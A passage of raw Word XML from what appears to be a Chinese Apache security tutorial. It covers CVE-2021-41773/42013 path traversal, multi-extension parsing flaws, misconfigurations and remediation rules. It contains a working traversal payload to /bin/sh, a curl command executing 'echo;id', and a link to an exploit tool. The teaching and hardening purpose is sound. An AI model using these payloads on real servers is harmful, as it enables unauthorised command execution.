            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120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图片 32"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"/>
                    <a:srcRect b="2198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9BB9C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p w14:paraId="5E0F348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用POST请求执行指令，payload如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085EE54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09820FA2" wp14:editId="5D9E7964">
            <wp:extent cx="5972810" cy="2161540"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="121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图片 33"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143"/>
                    <a:srcRect t="176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DA9A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通过curl来利用 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B270F7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Style w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>-v --data "echo;id" 'http://ip:8080/cgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA492E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还可以使用该漏洞专门的利用工具 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A40288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hyperlink r:id="rId144" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F01DCBE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bookmarkStart w:id="9" w:name="_Toc15369"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10.2 Apache其它解析漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="157E4DD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b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞原理 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D5C1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  Apache解析文件的规则是从右往左开始判断解析，若后缀名为不可识别解析的，就再往左判断。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4942CB8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如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test.php.owf.rar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“.owf”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>”.rar”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 这两种后缀是A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>不可识别解析的，则A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286C67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就会把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>xx.php.owf.rar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解析成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">文件。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2778CDED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①解析漏洞：自动忽略不可解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6080B8E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在Apache2.2版本及之前的站点目录将phpinfo.php改为phpinfo.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.xxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>然后访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4541DAB8" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl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23A3CC5E" wp14:editId="5DE40039">
            <wp:extent cx="5970905" cy="819785"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="39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图片 11"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145"/>
                    <a:srcRect t="26606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0A129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②其余配置漏洞1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE34CFB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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的httpd-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件里有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AddType application/x-httpd-php .jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置。即使扩展</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340CFDA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名是 .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>结尾，一样能以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件方式来解析，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>xx.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716C63B5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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0EE96EE4" wp14:editId="2C4FCEB0">
            <wp:extent cx="5958840" cy="935990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39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图片 12"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146"/>
                    <a:srcRect t="40898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A07BE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添加一个phpinfo.jpg文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4800ED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0CB8EFB6" wp14:editId="2DD0CE51">
            <wp:extent cx="5974080" cy="405765"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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图片 14"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147"/>
                    <a:srcRect t="67841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87C6E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访问phpinfo.jpg文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA7D3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3E87D1EB" wp14:editId="7B8CEBB3">
            <wp:extent cx="5972810" cy="864870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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图片 15"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId148"/>
                    <a:srcRect t="25239" b="3524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2D7E4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③其余配置漏洞2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1070F3B1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若在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的httpd-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件里有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AddHandler php5-script .php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置。那么只要文件名里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584177B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包含 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字段，即使文件名是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">test2.php.jpg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>也会以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件来解析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6299F7A3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683B2F3B" wp14:editId="418FD85B">
            <wp:extent cx="5951220" cy="488315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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图片 16"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId149"/>
                    <a:srcRect t="47635" b="24381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E160F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添加一个phpinfo.php.jpg文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6261223A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114300" distR="114300" wp14:anchorId="466BE071" wp14:editId="338E3089">
            <wp:extent cx="5975985" cy="678180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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图片 17"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId150"/>
                    <a:srcRect t="55666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AF0AC" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="0" w:lineRule="atLeast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访问phpinfo.php.jpg文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FDC02" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="70E8B74E" wp14:editId="2ACD2CBD">
            <wp:extent cx="5973445" cy="857885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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图片 18"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId151"/>
                    <a:srcRect t="24472" b="35886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83DA7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r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10.3 Apache漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F1EC23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 xml:space="preserve">①禁止执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:snapToGrid w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.php.</w:t>
      </w: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文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FCC49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禁止执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.php.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>这样的文件，在Apache配置文件里面加入如下配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0ED8C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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Files ~ “.(php.|php3.)”&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A02BA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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">       Order Allow,Deny </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7972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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">       Deny from all </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532FC70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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;/Files&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF35964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②采用伪静态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9493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采用伪静态，重写类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.php.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>这类的文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A8E6F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1、打开A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>pache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>httpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18770EC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2、找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>LoadModule rewrite_module modules/mod_rewrite.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F4CC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3、把 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>#</w:t>
      </w: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 号去掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B034C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4、保存A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>pache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置文件，重启PHP study服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E54D4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5、在网站根目录下建立 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.htaccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件，添加如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D32D7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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">IfModule mod_rewrite.c&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83BAF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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">RewriteEngine On </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8914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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">RewriteRule .(php.|php3.) /index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA8B8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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">RewriteRule .(pHp.|pHp3.) /index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27134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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">RewriteRule .(phP.|phP3.) /index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1C802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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
